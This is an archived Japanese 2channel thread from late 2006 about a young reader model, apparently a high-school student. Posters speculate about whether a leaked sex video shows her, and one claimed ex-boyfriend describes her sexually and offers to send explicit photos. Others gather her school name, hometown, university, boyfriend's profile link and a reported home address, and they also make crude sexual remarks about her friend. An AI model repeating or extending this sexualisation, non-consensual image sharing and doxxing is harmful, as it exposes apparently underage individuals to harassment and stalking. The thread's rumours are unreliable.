だから初めから違うって言ってるし。
有紀子ちゃんはエッチは好きじゃないから・・・
不感症だから声も出ないし。

208 :無名モデル:2006/11/05(日) 09:27:26 ID:EPJIjNeu
あの場所ならほくろ隠れるでしょ

209 :無名モデル:2006/11/05(日) 09:39:14 ID:???
>>207
何でそんなこと知ってるんだよw

210 :無名モデル:2006/11/05(日) 14:01:59 ID:RlMH9XZ8
あんなでっかいほくあったら水着になったら見えるんじゃん?
まぁどうしてもゆきこちゃんて決め付けたい人は聞かないだろうけどさ〜

211 :無名モデル:2006/11/05(日) 14:44:49 ID:z75AGb0R
ゆきこじゃないよw

212 :無名モデル:2006/11/05(日) 14:49:05 ID:???
有紀子ちゃんじゃないよ。海イベ行って有紀子ちゃんの水着姿生でみたもん。ホクロなかったし絶対と言い切れるよ。違うって

213 :無名モデル:2006/11/05(日) 15:17:43 ID:8r7H2v5j
顔似てるけどなあ‥付き合ってた頃と同じ左手に指輪してるし‥

214 :無名モデル:2006/11/05(日) 15:38:05 ID:kugnWwma
たかがほくろ一つでゴチャゴチャうるせぇなwwww

215 :無名モデル:2006/11/05(日) 16:32:21 ID:1/pDCNdv
動画ほくろなんかある?乳首じゃないのか。

216 :無名モデル:2006/11/05(日) 18:05:07 ID:X8eVuuVA
話変わるけど今月のPOPのゆきこちゃんかわったんだねーずいぶん

217 :無名モデル:2006/11/05(日) 18:09:53 ID:sQqUh063
画像みれないから、本人かどうかわかんないけど、こんなとこにのせるなんて最低だね。
ゆきこちゃんかわいそう…。

218 :無名モデル:2006/11/05(日) 18:42:34 ID:???
>>209
おれは元彼氏だからだよ

219 :無名モデル:2006/11/05(日) 20:16:33 ID:RlMH9XZ8
指輪なんて誰だって薬指にするでしょ。
まぁ勘違いされた方も、似てるからってムービー載せられた人も迷惑だよね…
同情する…

220 :無名モデル:2006/11/05(日) 20:57:01 ID:???
>>218
いつから男になったんだw

221 :無名モデル:2006/11/05(日) 21:52:30 ID:???
でもそこまで似てて、声までそっくりな人っているもんかな?
そうそういないと思うけどねえ。

222 :無名モデル:2006/11/05(日) 22:37:26 ID:yvBtwttX
ムービ見たけど乳首黒かった

223 :無名モデル:2006/11/05(日) 22:55:55 ID:aROkwP2C
http://1st.geocities.jp/peach57665927/hyoushi.htm

事務所入ったんだね☆

224 :無名モデル:2006/11/05(日) 22:58:59 ID:???
胸と胸の間にホクロあるよ有紀子ちゃんじゃないね

225 :無名モデル:2006/11/05(日) 23:08:18 ID:???
>>221
顔が似ている→骨格が似ている→声も似る

226 :無名モデル:2006/11/06(月) 00:04:30 ID:???
ムービー見た。
全然本人じゃないし・・・
有紀子ちゃんは毛がもっと薄いから。
誰だ、ガセネタを流したのは。

227 :無名モデル:2006/11/06(月) 00:38:04 ID:???
>>207=>>226

だから何でそんなこと知ってるの?w

228 :無名モデル:2006/11/06(月) 01:01:47 ID:???
>>227
しつこいな。
元彼氏だって言ってるだろ。

229 :無名モデル:2006/11/06(月) 06:38:21 ID:???
声は聞いたことないけど顔似すぎじゃない?

230 :無名モデル:2006/11/06(月) 07:25:51 ID:3KLygEUs
声も似てる

231 :無名モデル:2006/11/06(月) 07:57:45 ID:AZwqzkF6
>>228
元カレがちゃん付けする?何人目の彼氏?

232 :無名モデル:2006/11/06(月) 10:38:25 ID:???
>>228

お前がしつこいw
別人装って何回書き込みしてんだよw

233 :無名モデル:2006/11/06(月) 10:54:20 ID:???
じゃあ、写メ見せてやるよ。
エッチな写メも撮ってあるから。
ここにアドレスを書け。

234 :無名モデル:2006/11/06(月) 14:23:14 ID:+sqHD7AG
そんなに言うならここに写メ載せてみてよ

235 :無名モデル:2006/11/06(月) 18:34:41 ID:???
いや、大方メル友欲しいだけだろww

236 :無名モデル:2006/11/06(月) 19:11:29 ID:2YAX8oNI
>>223のゆきこちゃん可愛い!

237 :無名モデル:2006/11/07(火) 09:07:00 ID:45/uKJyg
写メ見せて!

238 :無名モデル:2006/11/07(火) 10:39:28 ID:???
アドレスなんか載せるかよw

ここに載せてw

一人に見せるなら
何人に見せても同じだろ

239 :無名モデル:2006/11/07(火) 11:49:12 ID:45/uKJyg
確かに!

240 :無名モデル:2006/11/07(火) 12:21:20 ID:qdoyJh5i
写メみたい

241 :無名モデル:2006/11/08(水) 01:45:32 ID:???
おまえら本当にバカだな。
こんなところに載せたら誰が載せたかわかるだろ?
事務所に所属することになってるんだから訴えられたらどうするんだ?
もっと頭を使えよ。
本当に欲しいならアドレス載せろよ。
送ってやるからよ。

242 :無名モデル:2006/11/08(水) 02:26:04 ID:???
241
あんたおかしいね…w
別にみんなそんな事やってをじゃん。何をビビってんの?w
本当は写メとかないだけでしょ。ほんと笑えるわ

243 :無名モデル:2006/11/08(水) 06:26:52 ID:???
誰も試しにアドレスを載せる奴はいないのか?

244 :無名モデル:2006/11/08(水) 09:44:55 ID:43uvDkzV
kawaii

245 :無名モデル:2006/11/08(水) 10:03:47 ID:???
じゃあここに送ってください

246 :無名モデル:2006/11/08(水) 19:26:18 ID:???
>>245
釣られてるな、バカ!
だからいい気になるんだよ、厨房が
本当に持ってたら普通は売るだろ?

247 :無名モデル:2006/11/08(水) 22:18:34 ID:???
>>241
低脳w

あたしがアドレス載せて、送られてきたシャメをあたしだけが見るとは限らないだろw

だから一人に見せたって、みんなに見せたって一緒w

女なのに男のふりしてる>>241釣り乙w

248 :無名モデル:2006/11/08(水) 22:57:08 ID:???
>>247
とりあえず男なんで、すんまそーん

249 :無名モデル:2006/11/09(木) 00:11:51 ID:???
>>247

っていうか、おまえ釣られてるやんw

バカ丸出しw

250 :無名モデル:2006/11/09(木) 01:30:19 ID:???
みんな馬鹿でもぉ良いぢゃん!笑

251 :無名モデル:2006/11/09(木) 06:35:05 ID:???
>>249

釣られてやったんだよw最初から釣りでしょ?w

252 :無名モデル:2006/11/09(木) 08:54:55 ID:???
>>251

おれは249だけど別におれが釣ったわけじゃないのにw

釣られて、バカにされて、やつあたりw

みっともないねw

253 :無名モデル:2006/11/09(木) 09:10:51 ID:???
有紀子のアソコはきれいだからあのオマンコとは違うね。
おれは前の高校のときにやらしてもらったけど胸の形も違ってた。
完全なニセモノだね。

254 :無名モデル:2006/11/09(木) 09:51:26 ID:8PbA7Q1G
本当にやり万なんだね

255 :無名モデル:2006/11/09(木) 11:14:15 ID:???
ヤリマンでもいいじゃないか、にんげんだもの

256 :無名モデル:2006/11/09(木) 12:38:15 ID:???
>>252

え??(゚Д゚)お前じゃないってわかってるよ?

最初から釣りってわかってるよって言っただけじゃん?


今月のポップも有紀子ちゃんかわいいね。痩せたやつは別人でびっくりした

257 :無名モデル:2006/11/09(木) 20:21:05 ID:???
>>256

いいよ。いまさら・・・

誰にでも失敗はあるんだから・・・

これからはあまりでしゃばらないで生きていきな

258 :無名モデル:2006/11/09(木) 22:38:44 ID:???
あなたも釣りしてる本人じゃないんだったらそんなにつっかからなくてもいいんじゃないですかね?でも釣りしてた人もいなくなりましたね

259 :無名モデル:2006/11/09(木) 22:45:31 ID:???
>>258

あまりに知ったかぶりなのでちょっと頭に来て。

有紀子ちゃんは知り合いだからあまり変なことを言わないで欲しいし。

260 :無名モデル:2006/11/09(木) 23:33:02 ID:???
やりとりを見てきましたが、>>256さんは、変なことを言ってた人に対して色々言ってくれてた気がしたのですが。。。あなたも>>256さんも同じ気持ちなのにそんなに怒られてはかわいそうです。一緒に仲良く平ちゃんを応援しましょう。それでは ノシ

261 :無名モデル:2006/11/10(金) 00:05:20 ID:???
流れぶった切って悪いが、ハルヤマのCMに有紀子ちゃん出てるの?

262 :無名モデル:2006/11/10(金) 03:25:02 ID:???
やらせてもらったって金でももらってたの?
二人しか付き合ったことないって本当かな

263 :無名モデル:2006/11/10(金) 06:05:56 ID:???
有紀子ちゃんって性病疑惑があるの?

264 :無名モデル:2006/11/10(金) 13:59:27 ID:QCRdm3m+
ぶっせぇよ、コイツ
歯並びがきしょい!
無理無理無理

265 :無名モデル:2006/11/10(金) 17:38:09 ID:???
マスカットのCMもだよね?

266 :無名モデル:2006/11/10(金) 19:01:50 ID:???
マスカットのCMって?てか有紀子ちゃんが前行ってた高校ってレベル高い進学校だよね?校則ゆるそうみたいだけど。

267 :無名モデル:2006/11/11(土) 15:18:58 ID:???
>>264
おまえは自分の顔を鏡で見てから書き込め
わかったか?

268 :264だ:2006/11/11(土) 16:49:18 ID:fdW4LSX2
俺は普通ですが。
歯並びフェチなんで。
出っ歯嫌いなんすよ。

269 :無名モデル:2006/11/11(土) 22:46:33 ID:???
有紀子ちゃんまたblog始めたよね!(Popモデルみんなだけど)嬉しい〜★

270 :無名モデル:2006/11/12(日) 08:47:08 ID:55zkbhyh
どこ?

271 :無名モデル:2006/11/12(日) 12:57:49 ID:???
>>268
普通なのにでしゃばるな。
それに有紀子ちゃんは出っ歯じゃないし。
誰と間違ってるんだよ。

272 :268だ:2006/11/12(日) 13:42:30 ID:dYnfwSzB
笑ったとき歯が口元からはみ出してる感があんだよ!
鼻広がりだしよ、たらこだし、しまりのねぇ口元が受け付けねぇんだよ

273 :無名モデル:2006/11/12(日) 16:55:54 ID:???
あのさー、別に好きじゃないんだったらここに来るなよ。
バカじゃないの?

274 :272だ:2006/11/13(月) 12:20:12 ID:1GnNzXDG
バカではないけど
それもそだねん♪
ほな、さいなら〜

275 :無名モデル:2006/11/13(月) 19:30:30 ID:uFpi71bM
平はヤリマンだもの

276 :無名モデル:2006/11/13(月) 20:36:16 ID:???
ブログどこにあるの?

277 :無名モデル:2006/11/13(月) 21:08:53 ID:/QQSeIJ+
ブログ教えて!

278 :無名モデル:2006/11/13(月) 22:18:10 ID:RXWkGNcP
リアルにこの人を間近で見たことあるけど、
普通に大人っぽくて落ち着きのある雰囲気だったし、
かーなーり細かったけど
病的なガリガリ体型ってわけでもない。
雑誌で見るより可愛かったよ。

279 :無名モデル:2006/11/14(火) 07:48:03 ID:???
ブログどこでやってるの?
私も間近で見た事あるけど、化粧は濃いめで声はほんわかした女の子っぽい声だった。背はちょっと高めだった
リズリサみたいなブリブリすぎるのよりCamCanみたいな大人っぽい可愛さのが似合うね

280 :無名モデル:2006/11/14(火) 07:55:36 ID:???
>>279
コイツ誰?

281 :無名モデル:2006/11/14(火) 13:27:05 ID:???
有紀子ちゃんは本当にかわいいね。
どこに行けば会えるのかな?

282 :無名モデル:2006/11/14(火) 15:57:27 ID:???
有紀子ちゃんのblogは今月号のポップにものってるけどギャルズポップってサイトだよ★有紀子ちゃんのblogURLのせたいけど登録しなきゃ見れないみたい?でも無料だから大丈夫だよ〜ギャルズポップのURLはhttp://galspop.jpだよ。今月号の183ページにも詳しく出てるから見てください!

283 :無名モデル:2006/11/15(水) 18:20:34 ID:???
>>282
ありがとう。
受験てどこ行くんだろ?普通の四年制大学かな?

一人一人に返事返してて偉いね

284 :無名モデル:2006/11/15(水) 21:31:05 ID:???
この前同じ車両だった!声かけれなかったけど、可愛すぎた!
popは最近見てないけど、雑誌より可愛いかったよ〜

285 :無名モデル:2006/11/15(水) 23:38:45 ID:???
>>284
学校の帰り?

286 :>>284:2006/11/16(木) 21:06:26 ID:???
有紀子ちゃん制服じゃなかったから、帰りじゃないかも!

287 :無名モデル:2006/11/17(金) 00:12:47 ID:???
通信だから制服とかないんじゃないの?

288 :無名モデル:2006/11/17(金) 23:51:27 ID:???
学校で見た事あるけど、私服の時と制服の時両方見たよ

289 :無名モデル:2006/11/18(土) 00:44:21 ID:si/813G2
学校どこ行ってるの??

290 :無名モデル:2006/11/18(土) 02:25:50 ID:???
松栄ってとこだけど、今は予備校行ってるんでしょ?

291 :無名モデル:2006/11/18(土) 19:41:52 ID:???
有紀子ちゃん大学うかったんだね!
おめでと〜

292 :無名モデル:2006/11/19(日) 06:40:50 ID:???
>>291
詳しく。なにに書いてあったの?

293 :無名モデル:2006/11/19(日) 16:58:52 ID:???
あげ

294 :無名モデル:2006/11/19(日) 19:05:01 ID:F9vHamiQ
大学入試、まだ始まってませーん

295 :無名モデル:2006/11/19(日) 19:08:09 ID:???
AOとか公募じゃないの?

296 :無名モデル:2006/11/19(日) 19:40:21 ID:p8iFH2Zt
http://pgma.jp/berry/girlBlogList.htm;jsessionid=A68D5C8F03EA771F7DD9B26601EA9CAF.tcitadaki?girlId=7
有紀子ちゃんのblog発見(^O^)

297 :無名モデル:2006/11/19(日) 22:56:38 ID:???
みいちゃんのblogに親友が受かったって書いてあったよ!一般だと思ってたから合格して嬉しいだって☆普通なら名前書くけど書かないって事は有紀子ちゃんじゃないかな?

298 :無名モデル:2006/11/19(日) 22:58:42 ID:???
有紀子ちゃんもblogは受験終わるまで更新があんまりできないって言ってたけど最近一気に更新したし♪落ちると思ってたAOとか公募が受かったのかな?あくまで私の予想ですが☆

299 :無名モデル:2006/11/19(日) 23:01:27 ID:???
>>294
はずかしいね

300 :無名モデル:2006/11/20(月) 14:17:25 ID:???
合格ってどこの大学なの?

301 :無名モデル:2006/11/20(月) 16:47:27 ID:???
気になるね☆有紀子ちゃんのblogで聞いたら教えてくれるかな?

302 :無名モデル:2006/11/20(月) 18:46:46 ID:???
おめでと〜う!

303 :無名モデル:2006/11/20(月) 23:43:24 ID:cBKm0Nki
有紀子ちゃんのブログにもみぃちゃんのブログにも今日映画観に行ったって書いてあるから、やっぱり合格したみたいだね

304 :無名モデル:2006/11/21(火) 00:50:50 ID:???
どこに合格したの?

305 :無名モデル:2006/11/21(火) 03:00:02 ID:???
みいちゃんのゲスブで有紀子ちゃんがどこ大学に合格したのか聞いた子いたみたいなんだけどみぃちゃんは本人が嫌がるからって教えてなかった…涙

306 :無名モデル:2006/11/21(火) 16:57:24 ID:???
なんで嫌がるんだろ?

有紀子ちゃんブログ二つやってるの?

307 :無名モデル:2006/11/21(火) 23:29:38 ID:???
やっぱり知られたら馬鹿大学とか言われたりするし詮索されるからかな?青学行ってる読モでも馬鹿大って言われる位だし…blogはPGとPopの2つやってるよ

308 :無名モデル:2006/11/23(木) 13:33:49 ID:wBMhZt2d
かわいい!!

309 :無名モデル:2006/11/23(木) 22:02:59 ID:???
遊んでばっかりで勉強もちゃんとしてなさそうだったのに
おしゃれ大学(青学とか立教とか)いけるわけないじゃん…
実際やっぱそれなりに頭よくないと入れない大学だし。
だから大学名は言わないと思うな。

310 :無名モデル:2006/11/23(木) 22:04:23 ID:???
有紀子ちゃんは拓殖大学だよ

311 :無名モデル:2006/11/23(木) 23:07:59 ID:???
頭悪いんだね
CanCamとかの読モしたいなら拓殖じゃあ無理でしょ。

312 :無名モデル:2006/11/23(木) 23:29:32 ID:???
どこ情報で拓殖?もし拓殖が本当なら有紀子ちゃんはプロフで英語が好きで理系が嫌いって言ってるし行く学部は多分外国語か英米語だね〜

313 :age:2006/11/23(木) 23:29:33 ID:aNrLyq+b
読モじゃなくて専属モデルになるために事務所入ったんだって!

314 :無名モデル:2006/11/23(木) 23:41:15 ID:???
てか拓殖の公募の合格発表日調べたらみぃちゃんの日記の日付と同じだった!やっぱ拓殖で決まりっぽいね〜みぃのその日の日記消されてたけど

315 :無名モデル:2006/11/24(金) 00:03:24 ID:???
公募って通信の人でも受かるんだね
所詮拓殖はそのくらいのレベルかぁ

316 :無名モデル:2006/11/24(金) 00:10:41 ID:Fh6syJET
どこの専属なりたいんですか?キャンキャン?

317 :無名モデル:2006/11/24(金) 01:30:59 ID:???
拓殖大学に今の彼氏がいるらしいよ。
だから拓殖にしたんだって。

318 :無名モデル:2006/11/24(金) 01:53:19 ID:???
拓殖の公募は評定平均3・5以上で書類審査と小論文だね。仮に英米文学科なら偏差値は50って所かな?日東駒専が基準としてそれよりちょい下。

319 :無名モデル:2006/11/24(金) 06:04:39 ID:???
大学に行かなくてもどうせ遊んでるのにね

320 :無名モデル:2006/11/24(金) 09:00:51 ID:R5eHV1tZ
PGのブログってまだ見た事がないんですが、どなたか教えてくれませんか?m(__)m

321 :無名モデル:2006/11/24(金) 11:08:41 ID:???
>>320ちょっと前のレスにあるから自分で探せ

322 :320:2006/11/24(金) 12:38:13 ID:R5eHV1tZ
>>321
見つかりました!どうもありがとうございました!m(__)m

323 :無名モデル:2006/11/24(金) 13:00:57 ID:???
みぃちゃんと同じ大学に入ったの?
彼氏が同じだからって前の竜也って人?
別れたんじゃなかったの?

324 :無名モデル:2006/11/24(金) 13:04:20 ID:???
今のって事は竜也って人じゃないみたいだね
なんで別れたんだろ?
今彼とまた雑誌に一緒に出るのかな

325 :無名モデル:2006/11/24(金) 15:14:48 ID:???
竜也のあとに3人付き合ってるらしいけど?
たしかみぃちゃんが書いてた。

326 :無名モデル:2006/11/24(金) 15:54:58 ID:???
みぃちゃんそうぃう事しない人だよ!勝手な事言わないで。かわぃそう…

327 :無名モデル:2006/11/24(金) 23:52:06 ID:???
確かにみいちゃんはそんな事書いてないよ!ちなみにみいちゃんと有紀子ちゃんは違う大学!!

328 :無名モデル:2006/11/25(土) 08:42:07 ID:???
みぃちゃんのブログ教えて〜♪

329 :無名モデル:2006/11/25(土) 15:29:00 ID:???
http://mbsp.jp/minapuni/だよ〜

330 :無名モデル:2006/11/25(土) 17:55:37 ID:???
>>329
ありがと〜♪


331 :無名モデル:2006/11/28(火) 15:49:25 ID:V79StOUH
gyaoのダメイクの安田美沙子似の現役女子高生ってゆうの見たら
有紀子ちゃんでてたよ(>▽<*)びっくりしたぁすごい可愛かった!

332 :無名モデル:2006/11/28(火) 16:17:21 ID:???
>>331今更その話かよ

333 :無名モデル:2006/11/28(火) 23:25:42 ID:???
有紀子ちゃんの彼氏のプロフを発見。
でも変な男だと思うけど。
みなさんはどう思いますか?

http://pr3.cgiboy.com/s/4702884

334 :無名モデル:2006/11/28(火) 23:32:55 ID:???
>>333本当にその人なの?

335 :無名モデル:2006/11/28(火) 23:33:57 ID:dUunULq+
>>333
プロフを持ってる
なおかつ写真を載せてるって人自体受け付けない

336 :無名モデル:2006/11/29(水) 00:13:57 ID:???
ダメイクって携帯からは見れないよね?

>>333
その髪型ギャグじゃんw
サイヤ人みたいだし重力で浮いたみたいw
さすがにこんなキモい勘違い空回りギャル男と付き合うかな?

337 :無名モデル:2006/11/29(水) 00:15:37 ID:???
もしかしたら自分で書き込みしたんじゃないの?
注目されたくて・・・
こういうバカはみんなで応援してあげましょうよ。
ゲストブックに書き込みしてあげよう。

338 :無名モデル:2006/11/29(水) 01:31:57 ID:???
あの変な男が有紀子ちゃんの彼氏だったら嫌だな。
完全にキモ男だよ。
なんか有紀子ちゃんのセンスを疑うよ。

339 :無名モデル:2006/11/29(水) 23:14:11 ID:???
淳也君はかっこいいと思うよ。
みんなで見守っていってあげて。
妬まないであげようよ。

340 :無名モデル:2006/11/30(木) 01:15:56 ID:???
>>339
はぁ?かっこいいか?おまえの目は節穴か?

341 :無名モデル:2006/11/30(木) 14:39:23 ID:???
>>339
自演乙
そう思ってるのはお前だけ。どう見てもキモい勘違い男にしか見えない
男なのに妬むってお前頭大丈夫?

342 :無名モデル:2006/11/30(木) 17:33:26 ID:???
あのプロフ彼氏なわけない

343 :無名モデル:2006/11/30(木) 23:40:37 ID:???
淳也君、かっこいい!

344 :無名モデル:2006/12/01(金) 19:57:56 ID:???
1月号結構出てたね!
まじ色白くてかわいい

345 :無名モデル:2006/12/01(金) 23:14:54 ID:ANBszDrM
ブログで大宮で遊んだ みたぃなこと書いてあったけどどこに住んでるの?

346 :無名モデル:2006/12/02(土) 01:11:05 ID:???
東川口だよ

347 :無名モデル:2006/12/02(土) 14:09:28 ID:???
平さんとみいちゃんは違う中学高校なのに何処で知り合ったのかな〜?

348 :無名モデル:2006/12/02(土) 20:44:24 ID:???
中学のときから共通の友達がいて知り合いだったけど、高2の時に有紀子ちゃんが雑誌に載り始めたら荒川が猛アプローチしたから
荒川は雑誌に出てる友達を作るの必死だからね

349 :無名モデル:2006/12/03(日) 00:10:05 ID:???
またみぃちゃんの悪口か?
みぃちゃんはすごくいい子だよ。
なんか勘違いしてるバカがいるみたいだけど。

350 :無名モデル:2006/12/03(日) 02:46:45 ID:???
以外とみぃちゃんは有紀子ちゃんと友達歴短いね〜

351 :無名モデル:2006/12/03(日) 17:44:29 ID:???
なんでPOPモデルのクリパに有紀子ちゃん出てないの?

352 :無名モデル:2006/12/03(日) 18:56:23 ID:OiUWYqdj
有紀子ちゃんと同じ高校にいきたいんですけど、どこ高ですか??

353 :無名モデル:2006/12/03(日) 21:03:19 ID:???
>>352キモ

354 :無名モデル:2006/12/03(日) 21:42:39 ID:???
http://ime.nu/pr3.cgiboy.com/s/4702884

355 ::2006/12/03(日) 22:05:30 ID:???
有紀子ちゃんは今3年だから卒業だよ〜だから一緒の高校には行けない!でも大学は一緒の所行けるから頑張って★拓殖らしいけど?

356 :無名モデル:2006/12/04(月) 15:02:01 ID:???
拓殖大学ってバカっぽい
勉強しなくても行けるところじゃん

357 :無名モデル:2006/12/04(月) 16:14:14 ID:IQ8npKh7
みぃちゃんって一体何なの?なんでユキコちゃんスレなのにタイトルに名前入ってるの?

358 :無名モデル:2006/12/04(月) 19:59:29 ID:???
>>357過去スレ嫁

359 :無名モデル:2006/12/06(水) 20:09:12 ID:l9Ua+qMu
ゆうこりんのCMの洋服屋(はるやま?)のに出てない?

360 :無名モデル:2006/12/06(水) 22:19:49 ID:???
淳也って新しい彼氏なの?
みぃちゃんのブログに出てたけど。

361 :無名モデル:2006/12/07(木) 06:08:11 ID:???
みぃいい加減自演うざい

日記やホムペで親友の名前がころころ変わるような女じゃん

うすっぺらすぎ

362 :無名モデル:2006/12/07(木) 08:26:06 ID:???
みなみ先輩うすっぺらいどころか友達の事とかにはかなり熱い人だョ。ウチラにも慕われてるし。何も知らないでそぅいぅ事ぃってんぢゃねーョ

363 :無名モデル:2006/12/07(木) 13:11:38 ID:???
女子大。拓殖じゃないじゃん。

364 :無名モデル:2006/12/07(木) 14:31:32 ID:49PJXx4q
どこの女子大?

365 :無名モデル:2006/12/07(木) 15:09:11 ID:???
みい親友かわるよね…笑

366 :無名モデル:2006/12/07(木) 23:57:21 ID:???
拓殖大学だよ
みぃちゃんが言ってたよ
女子大だなんて誰が言ってるの?

367 :無名モデル:2006/12/08(金) 00:13:59 ID:???
>>366
みぃ本人に聞いたの?

368 :無名モデル:2006/12/08(金) 09:05:14 ID:???
親友は一人じゃない人だっているんだからみぃちゃんはそれでしょ?ブログ昔からみてるけど親友自体がかわってるわけじゃないし。何人かいる、それだけの事

369 :無名モデル:2006/12/08(金) 13:24:55 ID:???
有紀子ちゃんのブログにコメントしてる美穂って奴ウケるww
いつも『田舎なんで・・』みたいなチラ裏の内容www

370 :無名モデル:2006/12/08(金) 14:38:05 ID:???
みぃちゃんは聞けば何でも教えてくれるよ
有紀子ちゃんの住所も教えてくれたし

371 :無名モデル:2006/12/08(金) 18:04:19 ID:???
みぃかばってるやつ皆sageてる
本人乙

372 :無名モデル:2006/12/08(金) 18:27:51 ID:???
>>371
そんな自分も…www

373 :無名モデル:2006/12/08(金) 20:04:27 ID:???
みい、有紀子ちゃんに勝手に教えないでとか言われたのかな?

前までなんでも答えてたのに今は友達のことは答えられませんとかいってるよね

374 :無名モデル:2006/12/08(金) 23:29:58 ID:???
>>373いつの話だよww
過去レス嫁

375 :無名モデル:2006/12/09(土) 03:46:20 ID:???
みぃちゃんのプロフに前は有紀子ちゃんの名前が書いてあったのになくなってる!てか拓殖大学だって言い張ってる人いるけどみぃちゃんのブログにも書かれてないから!

376 :無名モデル:2006/12/09(土) 05:52:36 ID:???
おれの友達が拓殖を受けたけどそのときに有紀子ちゃんがいたんだって

377 :無名モデル:2006/12/09(土) 10:38:23 ID:???
てか同じ学校だけど、女子大って出てたよ。

378 :無名モデル:2006/12/09(土) 14:19:03 ID:???
拓殖大学って嘘っぼい…だいたい拓殖のキャンパスは有紀子ちゃんの地元から遠すぎ…八王子だよ

379 :無名モデル:2006/12/10(日) 06:02:55 ID:???
別にどこの学校でもよくない?
ここに来る奴らが有紀子ちゃんの友達になれるとは思えないし。

380 :無名モデル:2006/12/11(月) 03:15:56 ID:???
>>377
通信の方の高校?

381 :無名モデル:2006/12/11(月) 14:34:13 ID:???
377は知ったかぶりのうそつきです

382 :無名モデル:2006/12/11(月) 19:27:33 ID:???
みい、モデルと金持ちすきだよね…

383 :無名モデル:2006/12/13(水) 00:42:31 ID:???
だからみぃちゃんの悪口はやめろって
そんな悪い子じゃないんだから

384 :無名モデル:2006/12/13(水) 11:05:33 ID:???
みぃ、自作自演しまくりww

385 :無名モデル:2006/12/14(木) 01:22:20 ID:???
おまえは誰なんだよ?
みぃちゃんのことを悪く言えるような人間か?

386 :無名モデル:2006/12/14(木) 14:04:00 ID:???
>>385
お前が誰だよ

387 :無名モデル:2006/12/14(木) 14:06:41 ID:???
なら僕は警察官!

388 ::2006/12/14(木) 14:59:06 ID:YdyW4FFI
有紀子ちゃんって声もかわいいよね

389 :無名モデル:2006/12/14(木) 21:09:01 ID:7IlRtj1q
>>369ブログ見た!
ほんとどーでもいい話長々と語っててウケる 前略プロフだったら叩かれるだろうなwwwww

390 :無名モデル:2006/12/14(木) 23:29:57 ID:???
みいカットモデル今もやってるのかな?

391 :無名モデル:2006/12/15(金) 12:25:09 ID:???
>>348の話は本当らしいね
モデルとかだったらすぐ食いつくよみいって子
あとかわいい子ならね

392 :無名モデル:2006/12/15(金) 13:53:02 ID:SOQa3lAl
敬語使えないくらいいいじゃない…若いんだし。
最初は敬語使ってたよー仲良くなってからタメ語になったけど、若いうちは敬語くらい許容範囲です。
何故なら可愛いから…いや、可愛いくて素直で好きだから。
因みに誰だって最初からギャルじゃないでしょうに……。
でもすっぴんでも可愛い…訳あってもう会えないんだけど本当に大好き。
ゆきこちゃん見ると自分がコケシかハニワっぽく見えて……
整形しようか考えちゃうし私が男だったら貢いでたかも……orz

393 :無名モデル:2006/12/15(金) 17:05:27 ID:gFSVHZzn
大学決まって埋没したね。GYAOのすっぴんですぐ分かる。前はナチュラルで可愛かったのに、すっぴんのっぺり顔に…

394 :無名モデル:2006/12/15(金) 17:16:51 ID:4AoNeAgX
>>392キモい
何熱く語っちゃってんの

395 :無名モデル:2006/12/15(金) 18:47:38 ID:???
>>391
だよね!有紀子ちゃん可哀相

396 :無名モデル:2006/12/15(金) 19:16:45 ID:0tdvZ1XM
みぃちゃんのブログおしえてください!

397 :無名モデル:2006/12/15(金) 20:37:30 ID:???
>>396ちょっと前のレスにあるんだから自分で探せ

398 :無名モデル:2006/12/15(金) 22:21:04 ID:0tdvZ1XM
ありがとうございます!

399 :無名モデル:2006/12/16(土) 14:28:26 ID:???
ホムペ消えたね

400 :無名モデル:2006/12/16(土) 22:13:02 ID:68UTiyAi
>>400だったらゆきこちゃんみたくなれる(^ω^)

401 :無名モデル:2006/12/17(日) 17:33:36 ID:???
おれは有紀子がどこの大学に行くか知ってるよ
教えて欲しい?
でも教えないよ
これからは有紀子はおれが守るから

http://pr4.cgiboy.com/S/6474362

402 :無名モデル:2006/12/17(日) 18:15:56 ID:???
>>401
おまえは誰だよ?
また変な男が出てきたな。

403 :無名モデル:2006/12/19(火) 09:32:46 ID:di5vNUkG
こんな時期までモデルやってるんじゃ受験なんて無理だな!

404 :無名モデル:2006/12/19(火) 10:44:32 ID:/KO6rWik
受験終わったみたいだけど

405 :無名モデル:2006/12/19(火) 13:05:31 ID:AMzwPubp
>>403
もう大学きまってますが…

406 :無名モデル:2006/12/19(火) 13:59:43 ID:???
>>403
恥をかきましたね?
わざわざ来なければいいのに

407 :無名モデル:2006/12/19(火) 14:58:16 ID:GVfHxGw7
みぃちゃんと同じ学校だったよ

408 :無名モデル:2006/12/19(火) 20:33:19 ID:???
>>407
みぃネタいらねw

409 :無名モデル:2006/12/19(火) 20:50:43 ID:???
もうみぃの名前出すのやめよー
調子にのるだけ

410 :無名モデル:2006/12/19(火) 22:38:17 ID:???
なんでだよ。みぃちゃんはかわいいし。

411 :無名モデル:2006/12/20(水) 23:24:40 ID:???
かわいいとかじゃなくて一般人だから興味ない
本人調子のるだけだし

412 :無名モデル:2006/12/21(木) 13:31:52 ID:???
有紀子よりかわいいと思うけど?
みぃちゃんは有紀子みたいにでしゃばりじゃないだけだし。

413 ::2006/12/21(木) 20:51:20 ID:???
みいちゃんの話しとかいらないよ…
有紀子ちゃんの日記にテレビ情報があったけどいつでるのかなぁ?

414 :無名モデル:2006/12/22(金) 00:00:25 ID:???
有紀子ちゃんの日記ってどこで見れるの?

415 ::2006/12/22(金) 14:27:31 ID:???
POPがやってるサイトだよ〜POP読んでる?
POP読んでるならサイトのURL書いてあるよー!
無料で登録すれば見れる★

416 :無名モデル:2006/12/23(土) 15:02:35 ID:DUqo5Yqe
有紀子ちゃんかわいいけど常識なさそう
ギャオのカラオケのとか見ててイライラする

417 :無名モデル:2006/12/23(土) 19:31:14 ID:???
この可愛さ犯罪だろhttp://q.pic.to/7moa6

418 :無名モデル:2006/12/25(月) 14:58:02 ID:C55r40DA
有紀子ちゃんって松栄だったんだね!

419 :無名モデル:2006/12/25(月) 18:25:00 ID:B51L5xLN
ほくろが多い

420 :無名モデル:2006/12/26(火) 06:52:57 ID:???
アナルにもホクロがあるよ。

421 :無名モデル:2006/12/26(火) 13:43:05 ID:???
みぃホムペとか消したけどどーせすぐまたやり始めるよね。

422 :無名モデル:2006/12/26(火) 23:34:50 ID:???
みぃちゃんのオマンコは毛深いの?

423 :無名モデル:2006/12/27(水) 08:28:02 ID:KFicTGRU
セレブなクリスマス過ごしたのかな?☆

424 :無名モデル:2006/12/27(水) 09:38:52 ID:???
有紀子はクリスマスは彼氏と一緒だったって言ってたよ
横浜のコンチネンタルホテルに泊まったらしいよ

425 :無名モデル:2006/12/27(水) 10:50:09 ID:???
http://shmyl.com/nqinson


61 KB
■ このスレッドは過去ログ倉庫に格納されています

